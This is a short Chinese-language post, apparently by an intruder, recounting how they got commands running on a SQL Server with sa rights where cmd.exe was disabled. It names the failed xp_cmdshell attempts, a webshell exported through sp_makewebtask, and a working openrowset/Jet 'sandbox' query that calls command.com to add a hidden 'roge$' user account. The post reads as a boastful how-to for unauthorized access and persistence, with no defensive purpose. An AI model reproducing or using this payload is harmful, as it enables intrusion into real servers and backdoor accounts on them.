sa权限,用xp_cmdshell执行cmd但是返回命令行提示已关闭
然后又试了试其他存储OA,job,沙盒什么的全部玩了一圈下来,照样不能执行命令,很无奈啊,遇见个变态sa
试试了sp_make
webtask存储,还好能导出了个webshell
进去看看情况到底咋回事
连上sql 执行命令时突然想起穿山甲的4个存储过程执行命令都调用了CMD
cmd被禁用了,当然没得玩了
传了个cmd上去试试一样的不能执行
想了想用其他大杀器试试提权,cmd禁用了也没得玩了
在system32翻了翻,发现command.com也能执行命令,基本跟cmd差不多,但不太清楚这算不算命令提示符
在本机试了试,禁用了cmd,发现command.com正常运行。哈哈
果断调用沙盒用command.com执行
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("command.com /c net1 user roge$ /add")')
net user 看了看成功执行
